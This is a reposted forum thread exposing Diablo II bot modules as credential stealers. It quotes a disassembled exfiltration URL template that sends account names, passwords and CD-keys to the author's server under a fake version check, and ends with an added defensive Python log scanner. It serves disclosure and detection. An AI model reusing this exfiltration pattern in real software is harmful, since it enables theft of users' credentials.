_CM
This post was originally posted at Blizzhackers.com. Netter's programs (such as Meph- and Pindlesweeper) seem to submit your information to some sort of script on netter's server. Here's the whole thread:
~coolmission
I strongly advise you all to remove Mephsweeper/Pindlesweeper from your system, change all your passwords to accounts and scan your system for more malicious software.
Hellmonkeyz said:
Netter (nhnhnh) is the owner of netterhaufen.de and creator of Pindle Sweeper, Meph Sweeper, Chess, and other modules.
Netter acts like a nice guy to most, however, he is hiding a dark secret. His Pindle and Meph Bots are embedded with account and CD-Key stealing devices. Don't believe me? Take a look at this image provided to me by an anonymous user for use in this document:
This is a screen shot of his desktop, looking at a peculiar page at netterhaufen.de. This page is where he views his log of stolen accounts and keys. As you can see, I blocked out the passwords to protect the innocent. The CD-Keys mostly say N/A, however, there are some listed in that log, and I am sorry for whoever got scammed by Netter. I believe it grabs the CD-Keys from the registry, so only if you have used Onlyer's CD-Key Refiller will it be able to steal them. You may have noticed that at his website he started selling accounts as well as CD-Keys. I think you can make the connection of where these are coming from. You can visit the page in the screen shot and see the log, however, it requires a password to view the data, otherwise it is all ***'s. I am not telling anyone the password, so don't ask, and he's probably going to remove that page soon anyways.
Now, in case you are wondering, the PS and MS modules connect to http://www.netterhaufen.de/info/info.php to place the data in a text file which the http://www.netterhaufen.de/info/log.php file reads. If you want, you can disassemble the .d2h modules to see it for yourself.
This is how I found it in the newest MephSweeper module. First I used ASPackDie v1.41 to unpack ms.d2h. Now, you should be able to view the "real" module with a Hex Editor or a Disassembler. I disassembled it with OllyDbg to find the exact location of where the logging is taking place. Here is where I found the formatted string:
Code:
00AB16A2 |. 68 CC93AB00 PUSH unpacked.00AB93CC ; |format = "http://www.netterhaufen.de/info/info.php?t=%s&c=%s&a=%s&p=%s&r=%s&k1=%s&k2=%s&b=MephSweeper 0.4&g=%s"
The first variable (t=) is the time, the second (c=) is the character name, the third (a=) is the account, the fourth (p=) is the password, the fifth (r=) is the realm, the sixth (k1) is the classic key, the sixth (k2) is the expansion key, the seventh (b=) is the name of the bot (MephSweeper 0.4 in this case), and the last (g=) is the game type (expansion or normal). Then, after it he simply calls that URL with a WININET.InternetOpenURL and the PHP script does the rest. In between this it has some bullshit "checking version" things which are just a cover up. "Please standby, while we check your module version.." and "Great! You are using the most recent version." are just the bullshit messages Netter uses.
Here you can see in OllyDbg where this is at (I removed my start bar from the image). You can see the formatted string highlighted there, and above it is where he sets the time, and above it even further by "d2xcdkey" is where he grabs the key from the registry. Take a look around there if you want.
Now, if this isn't enough proof, I am not sure what is. Go ahead and view it on your own if you want, and other people who have the ability to do this can confirm it.
P.S -- Here is a (better) shot of Netter's desktop and part of a MSN conversation with Abinn, to prove that it is his computer and desktop:
MORE IMAGES
Netter copying a CD-Key from his stolen account // key log to his list of CD-Keys:
Netter copying CD-Keys from his list of keys to an E-Mail that he is sending to someone who bought some keys from his site:
This is me on Netter's log showing the CD-Key that he has sold to someone that Netter claims: "You can buy 100% working, brand-new and safe CD-Keys that work on every Realm! These CD-Keys have never been used before and each key will be sold only once to a customer."
(All these images have passwords and keys blurred out to protect the innocent, which Netter has unfortunately not done.)
- Hellmonkeys
~coolmission
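Added example, not part of the original thread or of any code quoted in it: a Python sketch of how a defender could search web-proxy logs for the request described in the quoted post, using the host, path and parameter names from the format string shown there. The log line format, the sample lines, the second host and the REDACTED marker are constructed for illustration.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Host, path and parameter names come from the format string quoted in the post.
EXFIL_HOST = "www.netterhaufen.de"
EXFIL_PATH = "/info/info.php"
EXFIL_PARAMS = {"t", "c", "a", "p", "r", "k1", "k2", "b", "g"}
SECRET_PARAMS = {"p", "k1", "k2"}  # password, classic key, expansion key

# Constructed sample proxy log: "<timestamp> <client> <method> <url>".
SAMPLE_LOG = """\
2000-01-01T18:02:11 10.0.0.5 GET http://www.netterhaufen.de/info/info.php?t=18:02&c=Sorc&a=acct1&p=hunter2&r=USEast&k1=N/A&k2=N/A&b=MephSweeper%200.4&g=expansion
2000-01-01T18:02:40 10.0.0.5 GET http://www.netterhaufen.de/index.php
2000-01-01T18:03:02 10.0.0.7 GET http://example.org/search?q=mephisto&p=2
2000-01-01T18:04:15 10.0.0.9 GET http://example.net/v.php?t=1&c=x&a=y&p=secretpw&r=z&k1=AAAA&k2=BBBB&b=bot&g=normal
"""

def classify(url):
    """Return 'exact' for the endpoint named in the post, 'pattern' for the
    same parameter set sent anywhere else, or None for unrelated traffic."""
    parts = urlsplit(url)
    params = {k for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
    if parts.hostname == EXFIL_HOST and parts.path == EXFIL_PATH:
        return "exact"
    # The full parameter set on another URL suggests the endpoint was moved.
    if EXFIL_PARAMS <= params:
        return "pattern"
    return None

def redact(url):
    """Mask password and key values so the alert does not re-leak them."""
    parts = urlsplit(url)
    safe = [(k, "REDACTED" if k in SECRET_PARAMS else v)
            for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(safe)))

def scan(log_text):
    """Return (timestamp, client, verdict, redacted_url) for each hit."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split(" ", 3)
        if len(fields) != 4:
            continue  # skip malformed lines
        ts, client, _method, url = fields
        verdict = classify(url)
        if verdict:
            hits.append((ts, client, verdict, redact(url)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any client that shows up in the results ran a module that sent its credentials, so the accounts behind it need the password change advised above.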